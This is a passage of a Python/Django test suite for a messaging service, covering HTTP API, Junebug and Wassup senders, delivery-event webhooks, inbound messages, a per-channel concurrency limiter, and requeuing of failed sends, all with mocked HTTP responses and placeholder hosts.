http_channel_override_payload = {
"channel_id": "HTTP_API_VOICE_OP",
"channel_type": Channel.HTTP_API_TYPE,
"default": False,
"configuration": {
"HTTP_API_URL": "http://example.com/",
"HTTP_API_AUTH": ("username", "password"),
"HTTP_API_FROM": "+4321",
"STRIP_FILEPATH": "true",
},
"concurrency_limit": 2,
"message_timeout": 20,
"message_delay": 10,
}
channel = Channel.objects.create(**http_channel_override_payload)
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_voice(
"+1234",
"",
speech_url=[
"http://sbm.com/eng_ZA/test1.mp3",
"http://sbm.com/zul_ZA/nested/test2.mp3",
"http://sbm.com/test3.mp3",
],
session_event="new",
)
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(
r["channel_data"]["voice"]["speech_url"],
["eng_ZA/test1.mp3", "zul_ZA/nested/test2.mp3", "test3.mp3"],
)
@responses.activate
def test_send_voice_strip_filepath_unicode(self):
"""
Using the send_voice function should send a request to the api with the
correct JSON data. The full path should be stripped if the
STRIP_FILEPATH key is present, even if it is a unicode.
"""
responses.add(
responses.POST,
"http://example.com/",
json={"result": {"message_id": "message-uuid"}},
status=200,
content_type="application/json",
)
http_channel_override_payload = {
"channel_id": "HTTP_API_VOICE_OP",
"channel_type": Channel.HTTP_API_TYPE,
"default": False,
"configuration": {
"HTTP_API_URL": "http://example.com/",
"HTTP_API_AUTH": ("username", "password"),
"HTTP_API_FROM": "+4321",
"STRIP_FILEPATH": "true",
},
"concurrency_limit": 2,
"message_timeout": 20,
"message_delay": 10,
}
channel = Channel.objects.create(**http_channel_override_payload)
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_voice(
"+1234", "", speech_url="http://sbm.com/test.mp3", session_event="new"
)
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(r["channel_data"]["voice"]["speech_url"], "test.mp3")
def test_fire_metric(self):
"""
Using the fire_metric function should result in an exception being
raised, since the generic http api doesn't support metrics sending.
"""
channel = Channel.objects.get(channel_id="HTTP_API_VOICE")
message_sender = MessageClientFactory.create(channel)
self.assertRaises(
HttpApiSenderException,
message_sender.fire_metric,
"foo.bar",
3.0,
agg="sum",
)
def test_send_image(self):
"""
Using the send_image function should result in an exception being
raised, since the generic http api doesn't support image sending.
"""
channel = Channel.objects.get(channel_id="HTTP_API_VOICE")
message_sender = MessageClientFactory.create(channel)
self.assertRaises(
HttpApiSenderException,
message_sender.send_image,
"+1234",
"Test",
image_url="http://test.jpg",
)
class TestJunebugAPISender(TestCase):
def setUp(self):
super(TestJunebugAPISender, self).setUp()
make_channels()
@responses.activate
def test_send_text(self):
"""
Using the send_text function should send a request to Junebug with the
correct JSON data.
"""
responses.add(
responses.POST,
"http://example.com/",
json={"result": {"message_id": "message-uuid"}},
status=200,
content_type="application/json",
)
channel = Channel.objects.get(channel_id="JUNE_TEXT")
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_text("+1234", "Test", session_event="resume")
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(r["to"], "+1234")
self.assertEqual(r["from"], "+4321")
self.assertEqual(r["content"], "Test")
self.assertEqual(r["channel_data"]["session_event"], "resume")
self.assertEqual(r["event_url"], "http://example.com/api/v1/events/junebug")
@responses.activate
def test_send_voice(self):
"""
Using the send_voice function should send a request to Junebug with the
correct JSON data.
"""
responses.add(
responses.POST,
"http://example.com/",
json={"result": {"message_id": "message-uuid"}},
status=200,
content_type="application/json",
)
channel = Channel.objects.get(channel_id="JUNE_VOICE")
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_voice(
"+1234",
"Test",
speech_url="http://test.mp3",
wait_for="#",
session_event="resume",
)
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body)
self.assertEqual(r["to"], "+1234")
self.assertEqual(r["from"], "+4321")
self.assertEqual(r["content"], "Test")
self.assertEqual(r["channel_data"]["session_event"], "resume")
self.assertEqual(r["channel_data"]["voice"]["speech_url"], "http://test.mp3")
self.assertEqual(r["channel_data"]["voice"]["wait_for"], "#")
self.assertEqual(r["event_url"], "http://example.com/api/v1/events/junebug")
def test_fire_metric(self):
"""
Using the fire_metric function should result in an exception being
raised, since Junebug doesn't support metrics sending.
"""
channel = Channel.objects.get(channel_id="JUNE_VOICE")
message_sender = MessageClientFactory.create(channel)
self.assertRaises(
HttpApiSenderException,
message_sender.fire_metric,
"foo.bar",
3.0,
agg="sum",
)
class TestWassupAPISender(TestCase):
def setUp(self):
super(TestWassupAPISender, self).setUp()
make_channels()
@responses.activate
def test_send_text(self):
"""
Using the send_text function should send a request to wassup with the
correct JSON data.
"""
responses.add(
responses.POST,
"http://example.com/api/v1/hsms/the-uuid/send/",
json={"uuid": "message-uuid"},
status=200,
content_type="application/json",
)
channel = Channel.objects.get(channel_id="WASSUP_API")
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_text("+1234", "Test", session_event="resume")
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body.decode())
self.assertEqual(r["to_addr"], "+1234")
self.assertEqual(r["localizable_params"], [{"default": "Test"}])
@responses.activate
def test_send_non_hsm_text(self):
"""
Using the send_text function should send a non hsm request to wassup
with the correct JSON data.
"""
responses.add(
responses.POST,
"http://example.com/api/v1/messages/",
json={"uuid": "message-uuid"},
status=200,
content_type="application/json",
)
channel = Channel.objects.get(channel_id="WASSUP_API_NON_HSM")
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_text(
"+1234", "Test non HSM message", session_event="resume"
)
self.assertEqual(res["message_id"], "message-uuid")
[r] = responses.calls
r = json.loads(r.request.body.decode())
self.assertEqual(r["to_addr"], "+1234")
self.assertEqual(r["number"], "+4321")
self.assertEqual(r["content"], "Test non HSM message")
@responses.activate
def test_send_image(self):
"""
Using the send_image function should send a request to wassup with the
correct JSON data.
"""
responses.add(
responses.GET,
"http://test.jpg",
body="",
status=200,
content_type="image/jpeg",
stream=True,
)
responses.add(
responses.POST,
"http://example.com/api/v1/messages/",
json={"uuid": "message-uuid"},
status=200,
content_type="application/json",
)
channel = Channel.objects.get(channel_id="WASSUP_API")
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_image("+1234", "Test", image_url="http://test.jpg")
self.assertEqual(res["message_id"], "message-uuid")
[jpg, r] = responses.calls
body = r.request.body.decode()
self.assertTrue("+1234" in body)
self.assertTrue("+4321" in body)
self.assertTrue("image_attachment" in body)
self.assertTrue('filename="test.jpg"' in body)
self.assertTrue("Content-Type: image/jpeg" in body)
@responses.activate
def test_send_voice(self):
"""
Using the send_voice function should send a request to wassup with the
correct JSON data.
"""
responses.add(
responses.GET,
"http://test.mp3",
body="",
status=200,
content_type="audio/mp3",
stream=True,
)
responses.add(
responses.POST,
"http://example.com/api/v1/messages/",
json={"uuid": "message-uuid"},
status=200,
content_type="application/json",
)
channel = Channel.objects.get(channel_id="WASSUP_API")
message_sender = MessageClientFactory.create(channel)
res = message_sender.send_voice(
"+1234",
"Test",
speech_url="http://test.mp3",
wait_for="#",
session_event="resume",
)
self.assertEqual(res["message_id"], "message-uuid")
[mp3, r] = responses.calls
body = r.request.body.decode()
self.assertTrue("+1234" in body)
self.assertTrue("+4321" in body)
self.assertTrue("audio_attachment" in body)
def test_fire_metric(self):
"""
Using the fire_metric function should result in an exception being
raised, since wassup doesn't support metrics sending.
"""
channel = Channel.objects.get(channel_id="WASSUP_API")
message_sender = MessageClientFactory.create(channel)
self.assertRaises(
WassupApiSenderException,
message_sender.fire_metric,
"foo.bar",
3.0,
agg="sum",
)
class TestWassupEventsApi(AuthenticatedAPITestCase):
def test_event_missing_fields(self):
"""
If there are missing fields in the request, and error response should
be returned.
"""
response = self.client.post(
reverse("wassup-events"), json.dumps({}), content_type="application/json"
)
self.assertEqual(
json.loads(response.content.decode()),
{
"accepted": False,
"reason": {
"data": ["This field is required."],
"hook": ["This field is required."],
},
},
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_event_no_message(self):
"""
If we cannot find the message for the event, and error response should
be returned.
"""
event = {
"hook": {"event": "message.direct_outbound.status"},
"data": {
"message_uuid": "bad-message-id",
"status": "sent",
"timestamp": "2018-05-04T16:00:18Z",
},
}
response = self.client.post(
reverse("wassup-events"), json.dumps(event), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
self.assertEqual(
json.loads(response.content.decode()),
{"accepted": False, "reason": "Cannot find message for ID bad-message-id"},
)
@patch("message_sender.views.fire_delivery_hook")
def test_event_ack(self, mock_hook):
"""A submitted event should update the message object accordingly."""
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
event = {
"hook": {"event": "message.direct_outbound.status"},
"data": {
"message_uuid": d.vumi_message_id,
"status": "sent",
"timestamp": "2018-05-04T16:00:18Z",
},
}
response = self.client.post(
reverse("wassup-events"), json.dumps(event), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, True)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata["ack_timestamp"], "2018-05-04T16:00:18Z")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
@responses.activate
@patch("message_sender.views.fire_delivery_hook")
def test_event_nack(self, mock_hook):
"""
A rejected event should retry and update the message object accordingly
"""
self.add_metrics_response()
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
post_save.connect(
psh_fire_msg_action_if_new,
sender=Outbound,
dispatch_uid="psh_fire_msg_action_if_new",
)
event = {
"hook": {"event": "message.direct_outbound.status"},
"data": {
"status": "unsent",
"message_uuid": d.vumi_message_id,
"timestamp": "2018-05-04T16:00:18Z",
"description": "stars not aligned",
},
}
response = self.client.post(
reverse("wassup-events"), json.dumps(event), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
c = Outbound.objects.get(pk=existing)
self.assertEqual(c.delivered, False)
self.assertEqual(c.attempts, 2)
self.assertEqual(c.metadata["nack_reason"], "stars not aligned")
self.assertEqual(
True,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123' "
"[session_event: new]"
),
)
mock_hook.assert_called_once_with(d)
@patch("message_sender.views.fire_delivery_hook")
def test_event_delivery_succeeded(self, mock_hook):
"""A successful delivery should update the message accordingly."""
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
event = {
"hook": {"event": "message.direct_outbound.status"},
"data": {
"status": "delivered",
"message_uuid": d.vumi_message_id,
"timestamp": "2018-05-04T16:00:18Z",
},
}
response = self.client.post(
reverse("wassup-events"), json.dumps(event), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, True)
self.assertEqual(d.attempts, 1)
self.assertEqual(d.metadata["delivery_timestamp"], "2018-05-04T16:00:18Z")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
@responses.activate
@patch("message_sender.views.fire_delivery_hook")
def test_event_delivery_failed(self, mock_hook):
"""
A failed delivery should retry and update the message accordingly.
"""
self.add_metrics_response()
existing = self.make_outbound()
d = Outbound.objects.get(pk=existing)
event = {
"hook": {"event": "message.direct_outbound.status"},
"data": {
"message_uuid": d.vumi_message_id,
"status": "failed",
"description": "computer said no",
"timestamp": "2018-05-04T16:00:18Z",
},
}
response = self.client.post(
reverse("wassup-events"), json.dumps(event), content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=existing)
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 2)
self.assertEqual(d.metadata["delivery_failed_reason"], "computer said no")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
),
)
mock_hook.assert_called_once_with(d)
@responses.activate
def test_create_inbound_wassup_message(self):
"""
If wassup send an inbound message to the inbound endpoint, then a
new Inbound should be created with the specified parameters.
"""
channel = Channel.objects.get(channel_id="WASSUP_API")
self.add_metrics_response()
message_id = str(uuid.uuid4())
event = {
"hook": {"event": "message.inbound"},
"data": {
"uuid": message_id,
"content": "the content",
"in_reply_to": None,
"metadata": {},
"from_addr": "+27820000123456789",
"to_addr": "+27000000000",
},
}
self.add_identity_search_response("+27820000123456789", "0c03d360")
response = self.client.post(
reverse("channels-inbound", kwargs={"channel_id": channel.channel_id}),
json.dumps(event),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.to_addr, "+27000000000")
self.assertEqual(d.from_identity, "0c03d360")
self.assertEqual(d.content, "the content")
self.assertEqual(d.transport_name, "")
self.assertEqual(d.transport_type, None)
self.assertEqual(d.helper_metadata, {})
@responses.activate
def test_create_inbound_wassup_unknown_msisdn(self):
"""
If wassup sends a new inbound message to the inbound endpoint, for
an address that doesn't exist in the identity store, then a new
identity should be created for that address.
"""
channel = Channel.objects.get(channel_id="WASSUP_API")
self.add_metrics_response()
message_id = str(uuid.uuid4())
event = {
"hook": {"event": "message.inbound"},
"data": {
"uuid": message_id,
"content": "the content",
"in_reply_to": None,
"metadata": {},
"from_addr": "+27820000123456789",
"to_addr": "+27000000000",
},
}
self.add_identity_search_response("+27820000123456789", "0c03d360")
self.add_create_identity_response("0c03d360", "+27820000123456789")
response = self.client.post(
reverse("channels-inbound", kwargs={"channel_id": channel.channel_id}),
json.dumps(event),
content_type="application/json",
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
d = Inbound.objects.last()
self.assertIsNotNone(d.id)
self.assertEqual(d.message_id, message_id)
self.assertEqual(d.to_addr, "+27000000000")
self.assertEqual(d.from_identity, "0c03d360")
self.assertEqual(d.content, "the content")
self.assertEqual(d.transport_name, "")
self.assertEqual(d.transport_type, None)
self.assertEqual(d.helper_metadata, {})
class TestConcurrencyLimiter(AuthenticatedAPITestCase):
def make_outbound(self, to_addr, channel=None):
if channel:
channel = Channel.objects.get(channel_id=channel)
self.add_identity_search_response(to_addr, "098734738")
self._replace_post_save_hooks_outbound() # don't let fixtures fire
outbound_message = {
"to_addr": to_addr,
"vumi_message_id": "075a32da-e1e4-4424-be46-1d09b71056fd",
"content": "Simple outbound message",
"delivered": False,
"metadata": {"voice_speech_url": "http://test.com"},
"channel": channel,
}
outbound = Outbound.objects.create(**outbound_message)
self._restore_post_save_hooks_outbound() # let tests fire tasks
return outbound
def set_cache_entry(self, msg_type, bucket, value):
key = "%s_messages_at_%s" % (msg_type, bucket)
self.fake_cache.cache_data[key] = value
def setUp(self):
super(TestConcurrencyLimiter, self).setUp()
self.fake_cache = MockCache()
@responses.activate
@patch("time.time", MagicMock(return_value=1479131658.000000))
@patch("django.core.cache.cache.get")
@patch("django.core.cache.cache.add")
@patch("django.core.cache.cache.incr")
def test_limiter_limit_not_reached(self, mock_incr, mock_add, mock_get):
"""
Messages under the limit should get sent.
"""
self.add_metrics_response()
# Fake cache calls
mock_incr.side_effect = self.fake_cache.incr
mock_add.side_effect = self.fake_cache.add
mock_get.side_effect = self.fake_cache.get
outbound1 = self.make_outbound(to_addr="+27820000123", channel="JUNE_VOICE2")
outbound2 = self.make_outbound(to_addr="+27987", channel="JUNE_VOICE2")
send_message(outbound1.pk)
send_message(outbound2.pk)
self.assertTrue(
self.check_logs(
"Message: '%s' sent to '%s' [session_event: new] [voice: "
"{'speech_url': 'http://test.com'}]"
% (outbound1.content, outbound1.to_addr)
)
)
self.assertTrue(
self.check_logs(
"Message: '%s' sent to '%s' [session_event: new] [voice: "
"{'speech_url': 'http://test.com'}]"
% (outbound2.content, outbound2.to_addr)
)
)
outbound1.refresh_from_db()
self.assertIsNotNone(outbound1.last_sent_time)
outbound2.refresh_from_db()
self.assertIsNotNone(outbound2.last_sent_time)
self.assertEqual(len(self.fake_cache.cache_data), 1)
bucket = 1479131658 // 60 # time() // bucket_size
self.assertEqual(
self.fake_cache.cache_data["JUNE_VOICE2_messages_at_%s" % bucket], 2
)
@responses.activate
@patch("time.time", MagicMock(return_value=1479131658.000000))
@patch("django.core.cache.cache.get")
@patch("django.core.cache.cache.add")
@patch("django.core.cache.cache.incr")
@patch("message_sender.tasks.send_message.retry")
def test_limiter_limit_reached(self, mock_retry, mock_incr, mock_add, mock_get):
"""
Messages under the limit should get sent. Messages over the limit
should get retried
"""
self.add_metrics_response()
mock_retry.side_effect = Retry
# Fake cache calls
mock_incr.side_effect = self.fake_cache.incr
mock_add.side_effect = self.fake_cache.add
mock_get.side_effect = self.fake_cache.get
outbound1 = self.make_outbound(to_addr="+27820000123", channel="JUNE_VOICE")
outbound2 = self.make_outbound(to_addr="+27987", channel="JUNE_VOICE")
send_message(outbound1.pk)
with self.assertRaises(Retry):
send_message(outbound2.pk)
mock_retry.assert_called_with(countdown=100)
self.assertTrue(
self.check_logs(
"Message: '%s' sent to '%s' [session_event: new] [voice: "
"{'speech_url': 'http://test.com'}]"
% (outbound1.content, outbound1.to_addr)
)
)
self.assertFalse(
self.check_logs(
"Message: '%s' sent to '%s' [session_event: new] "
"[voice: {'speech_url': 'http://test.com'}]"
% (outbound2.content, outbound2.to_addr)
)
)
outbound1.refresh_from_db()
self.assertIsNotNone(outbound1.last_sent_time)
outbound2.refresh_from_db()
self.assertIsNone(outbound2.last_sent_time)
self.assertEqual(len(self.fake_cache.cache_data), 1)
bucket = 1479131658 // 60 # time() // bucket_size
self.assertEqual(
self.fake_cache.cache_data["JUNE_VOICE_messages_at_%s" % bucket], 1
)
@patch("time.time", MagicMock(return_value=1479131640.000000))
@patch("django.core.cache.cache.get")
def test_limiter_buckets(self, mock_get):
"""
The correct buckets should count towards the message count.
"""
# Fake cache calls
mock_get.side_effect = self.fake_cache.get
now = 1479131640
self.set_cache_entry("JUNE_VOICE", (now - 200) // 60, 1) # Too old
self.set_cache_entry("JUNE_VOICE", (now - 121) // 60, 10) # Over delay
self.set_cache_entry(
"JUNE_VOICE", (now - 120) // 60, 100
) # Within delay # noqa
self.set_cache_entry("JUNE_VOICE", now // 60, 1000) # Now
self.set_cache_entry("JUNE_VOICE", (now + 60) // 60, 10000) # In future # noqa
channel = Channel.objects.get(channel_id="JUNE_VOICE")
count = ConcurrencyLimiter.get_current_message_count(channel)
self.assertEqual(count, 1100)
@patch("time.time", MagicMock(return_value=1479131658.000000))
@patch("django.core.cache.cache.get_or_set")
@patch("django.core.cache.cache.decr")
def test_limiter_decr_count(self, mock_decr, mock_get_or_set):
"""
Events for messages should decrement the counter unless the message is
too old.
"""
# Fake cache calls
mock_get_or_set.side_effect = self.fake_cache.get_or_set
mock_decr.side_effect = self.fake_cache.decr
self.set_cache_entry("JUNE_VOICE", 1479131535 // 60, 1) # Past delay
self.set_cache_entry("JUNE_VOICE", 1479131588 // 60, 1) # Within delay
self.set_cache_entry(
"JUNE_VOICE", 1479131648 // 60, -0
) # Invalid value # noqa
channel = Channel.objects.get(channel_id="JUNE_VOICE")
def get_utc(timestamp):
return datetime.fromtimestamp(timestamp).replace(
tzinfo=timezone.now().tzinfo
)
ConcurrencyLimiter.decr_message_count(channel, get_utc(1479131535))
ConcurrencyLimiter.decr_message_count(channel, get_utc(1479131588))
ConcurrencyLimiter.decr_message_count(channel, get_utc(1479131608))
self.assertEqual(
self.fake_cache.cache_data,
{
"JUNE_VOICE_messages_at_24652192": 1,
"JUNE_VOICE_messages_at_24652193": 0,
"JUNE_VOICE_messages_at_24652194": 0,
},
)
@responses.activate
def test_event_nack_concurrency_decr(self):
"""
When receiving a nack, we should decrement the correct concurrency
limiter for the channel that the nack is for.
"""
self.add_metrics_response()
channel = Channel.objects.get(channel_id="VUMI_VOICE")
outbound_message = {
"to_addr": "+27820000123",
"vumi_message_id": "08b34de7-c6da-4853-a74d-9458533ed169",
"content": "Simple outbound message",
"channel": channel,
"delivered": False,
"attempts": 3,
"metadata": {},
}
failed = Outbound.objects.create(**outbound_message)
failed.last_sent_time = failed.created_at
failed.save()
post_save.connect(
psh_fire_msg_action_if_new,
sender=Outbound,
dispatch_uid="psh_fire_msg_action_if_new",
)
nack = {
"message_type": "event",
"event_id": "b04ec322fc1c4819bc3f28e6e0c69de6",
"event_type": "nack",
"nack_reason": "no answer",
"user_message_id": failed.vumi_message_id,
"helper_metadata": {},
"timestamp": "2015-10-28 16:20:37.485612",
"sent_message_id": "external-id",
}
with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
response = self.client.post(
"/api/v1/events", json.dumps(nack), content_type="application/json"
)
mock_method.assert_called_once_with(channel, failed.created_at)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d = Outbound.objects.get(pk=failed.id)
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 3) # not moved on as last attempt passed
self.assertEqual(d.metadata["nack_reason"], "no answer")
self.assertEqual(
False,
self.check_logs(
"Message: 'Simple outbound message' sent to '+27820000123'"
"[session_event: new]"
),
)
@responses.activate
@patch("django.core.cache.cache.get_or_set")
@patch("django.core.cache.cache.decr")
@patch("message_sender.views.fire_delivery_hook")
@patch("message_sender.tasks.send_message.delay")
def test_event_nack_concurrency_decr_junebug(
self, mock_send_message, mock_hook, mock_get_or_set, mock_decr
):
"""
A rejected event should retry and update the message object accordingly
as well as decrement the relative concurrency limiter
"""
self.add_metrics_response()
# Fake cache calls
mock_get_or_set.side_effect = self.fake_cache.get_or_set
mock_decr.side_effect = self.fake_cache.decr
channel = Channel.objects.get(channel_id="VUMI_VOICE")
d = self.make_outbound(to_addr="+27820000123", channel=channel.channel_id)
d.last_sent_time = d.created_at
d.save()
post_save.connect(
psh_fire_msg_action_if_new,
sender=Outbound,
dispatch_uid="psh_fire_msg_action_if_new",
)
nack = {
"event_type": "rejected",
"message_id": d.vumi_message_id,
"channel-id": "channel-uuid-1234",
"timestamp": "2015-10-28 16:19:37.485612",
"event_details": {"reason": "No answer"},
}
with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
response = self.client.post(
"/api/v1/events/junebug",
json.dumps(nack),
content_type="application/json",
)
mock_method.assert_called_once_with(channel, d.created_at)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d.refresh_from_db()
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 0)
self.assertEqual(d.metadata["nack_reason"], {"reason": "No answer"})
mock_hook.assert_called_once_with(d)
@responses.activate
@patch("django.core.cache.cache.get_or_set")
@patch("django.core.cache.cache.decr")
@patch("message_sender.views.fire_delivery_hook")
@patch("message_sender.tasks.send_message.delay")
def test_event_delivery_failed_concurrency_decr_june(
self, mock_send_message, mock_hook, mock_get_or_set, mock_decr
):
"""
A failed delivery should retry and update the message accordingly, as
well as decrement the concurrency limiter.
"""
self.add_metrics_response()
# Fake cache calls
mock_get_or_set.side_effect = self.fake_cache.get_or_set
mock_decr.side_effect = self.fake_cache.decr
channel = Channel.objects.get(channel_id="VUMI_VOICE")
d = self.make_outbound(to_addr="+27820000123", channel=channel.channel_id)
d.last_sent_time = d.created_at
d.save()
dr = {
"event_type": "delivery_failed",
"message_id": d.vumi_message_id,
"channel-id": "channel-uuid-1234",
"timestamp": "2015-10-28 16:19:37.485612",
"event_details": {},
}
with patch.object(ConcurrencyLimiter, "decr_message_count") as mock_method:
response = self.client.post(
"/api/v1/events/junebug",
json.dumps(dr),
content_type="application/json",
)
mock_method.assert_called_once_with(channel, d.created_at)
self.assertEqual(response.status_code, status.HTTP_200_OK)
d.refresh_from_db()
self.assertEqual(d.delivered, False)
self.assertEqual(d.attempts, 0)
self.assertEqual(d.metadata["delivery_failed_reason"], {})
mock_hook.assert_called_once_with(d)
class TestRequeueFailedTasks(AuthenticatedAPITestCase):
def make_outbound(self, to_addr, channel=None):
if channel:
channel = Channel.objects.get(channel_id=channel)
self.add_identity_search_response(to_addr, "34857985789")
self._replace_post_save_hooks_outbound() # don't let fixtures fire
outbound_message = {
"to_addr": to_addr,
"vumi_message_id": "075a32da-e1e4-4424-be46-1d09b71056fd",
"content": "Simple outbound message",
"delivered": False,
"metadata": {"voice_speech_url": "http://test.com"},
"channel": channel,
}
outbound = Outbound.objects.create(**outbound_message)
self._restore_post_save_hooks_outbound() # let tests fire tasks
return outbound
@responses.activate
def test_requeue(self):
"""
When running the `requeue_failed_tasks` task, all the failed tasks
should be rerun, and all the failure objects for those tasks should
be removed from the database.
"""
self.add_metrics_response()
outbound1 = self.make_outbound(to_addr="+27820000123")
outbound2 = self.make_outbound(to_addr="+27987")
OutboundSendFailure.objects.create(
outbound=outbound1,
task_id=uuid.uuid4(),
initiated_at=timezone.now(),
reason="Error",
)
requeue_failed_tasks()
outbound1.refresh_from_db()
self.assertIsNotNone(outbound1.last_sent_time)
outbound2.refresh_from_db()
self.assertIsNone(outbound2.last_sent_time)
self.assertEqual(OutboundSendFailure.objects.all().count(), 0)
class TestFailedMsisdnLookUp(TestCase):
def add_identity_no_address_search_response(self, msisdn, identity, count=0):
response = {"next": None, "previous": None, "results": []}
responses.add(
responses.GET,
"%s/identities/%s/addresses/msisdn"
% (settings.IDENTITY_STORE_URL, identity), # noqa
json=response,
status=200,
)
@responses.activate
def test_fire_failed_msisdn_lookup(self):
"""
trigger a webhook if there is no to_addr in the identity
"""
send_message = SendMessage()
new_channel = {
"channel_id": "NEW_DEFAULT",
"channel_type": Channel.JUNEBUG_TYPE,
"default": True,
"configuration": {
"JUNEBUG_API_URL": "http://example.com/",
"JUNEBUG_API_AUTH": ("username", "password"),
"JUNEBUG_API_FROM": "+4321",
},
"concurrency_limit": 0,
"message_timeout": 0,
"message_delay": 0,
}
Channel.objects.create(**new_channel)
self.assertEqual(Channel.objects.filter(default=True).count(), 1)
channel = Channel.objects.get(channel_id="NEW_DEFAULT")
self.add_identity_no_address_search_response("", "0c03d360")
outbound = {
"id": "075a32da-e1e4-4424-be46-1d09b71056fd",
"to_identity": "0c03d360",
"to_addr": "",
"content": "Simple outbound message",
"delivered": False,
"metadata": {"voice_speech_url": "https://foo.com/file.mp3"},
"channel": channel,
}
outbound = Outbound.objects.create(**outbound)
user = User.objects.create_user("test")
hook = Hook.objects.create(
event="identity.no_address", target="http://webhook", user=user
)
responses.add(method=responses.POST, url="http://webhook", json={}, status=200)
send_message.run("075a32da-e1e4-4424-be46-1d09b71056fd")
webhook = responses.calls[-1].request
self.assertEqual(
json.loads(webhook.body),
{"hook": hook.dict(), "data": {"to_identity": "0c03d360"}},
)
class TestFailedTaskAPI(AuthenticatedAPITestCase):
def make_outbound(self, to_addr, channel=None):
if channel:
channel = Channel.objects.get(channel_id=channel)
self.add_identity_search_response(to_addr, "34857985789")
self._replace_post_save_hooks_outbound() # don't let fixtures fire
outbound_message = {
"to_addr": to_addr,
"vumi_message_id": "075a32da-e1e4-4424-be46-1d09b71056fd",
"content": "Simple outbound message",
"delivered": False,
"metadata": {"voice_speech_url": "http://test.com"},
"channel": channel,
}
outbound = Outbound.objects.create(**outbound_message)
self._restore_post_save_hooks_outbound() # let tests fire tasks
return outbound
@responses.activate
def test_failed_tasks_list(self):
"""
When making a GET requests to the failed tasks endpoint, a paginated
list of all of the failed tasks should be returned.
"""
self.add_metrics_response()
outbound1 = self.make_outbound(to_addr="+27820000123")
failures = []
for i in range(3):
failures.append(
OutboundSendFailure.objects.create(
outbound=outbound1,
task_id=uuid.uuid4(),
initiated_at=timezone.now(),
reason="Error",
)
)
response = self.client.get(
"/api/v1/failed-tasks/", content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
results = response.data["results"]
self.assertEqual(len(results), 2)
self.assertEqual(results[0]["id"], failures[2].id)
self.assertEqual(results[1]["id"], failures[1].id)
self.assertIsNotNone(response.data["next"])
response = self.client.get(
response.data["next"], content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
results = response.data["results"]
self.assertEqual(len(results), 1)
self.assertEqual(results[0]["id"], failures[0].id)
@responses.activate
def test_failed_tasks_requeue(self):
"""
When making a POST requests to the failed tasks endpoint, all of the
failed tasks should be rerun, and all of the failure objects should
be removed from the database.
"""
self.add_metrics_response()
outbound1 = self.make_outbound(to_addr="+27820000123")
OutboundSendFailure.objects.create(
outbound=outbound1,
task_id=uuid.uuid4(),
initiated_at=timezone.now(),
reason="Error",
)
response = self.client.post(
"/api/v1/failed-tasks/", content_type="application/json"
)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(response.data["requeued_failed_tasks"], True)
self.assertEqual(OutboundSendFailure.objects.all().count(), 0)
class TestOutboundAdmin(AuthenticatedAPITestCase):
def setUp(self):
super(TestOutboundAdmin, self).setUp()
self.adminclient.login(username="testsu", password="dummypwd")
@patch("message_sender.tasks.send_message.apply_async")
def test_resend_outbound_only_selected(self, mock_send_message):
outbound_id = self.make_outbound()
self.make_outbound()
data = {"action": "resend_outbound", "_selected_action": [outbound_id]}
response = self.adminclient.post(
reverse("admin:message_sender_outbound_changelist"), data, follow=True
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertContains(response, "Attempting to resend 1 message.")
mock_send_message.assert_called_once_with(kwargs={"message_id": outbound_id})
@patch("message_sender.tasks.send_message.apply_async")
def test_resend_outbound_multiple(self, mock_send_message):
outbound_id_1 = self.make_outbound()
outbound_id_2 = self.make_outbound()
data = {
"action": "resend_outbound",
"_selected_action": [outbound_id_1, outbound_id_2],
}
response = self.adminclient.post(
reverse("admin:message_sender_outbound_changelist"), data, follow=True
)
self.assertEqual(response.status_code, status.HTTP_200_OK)
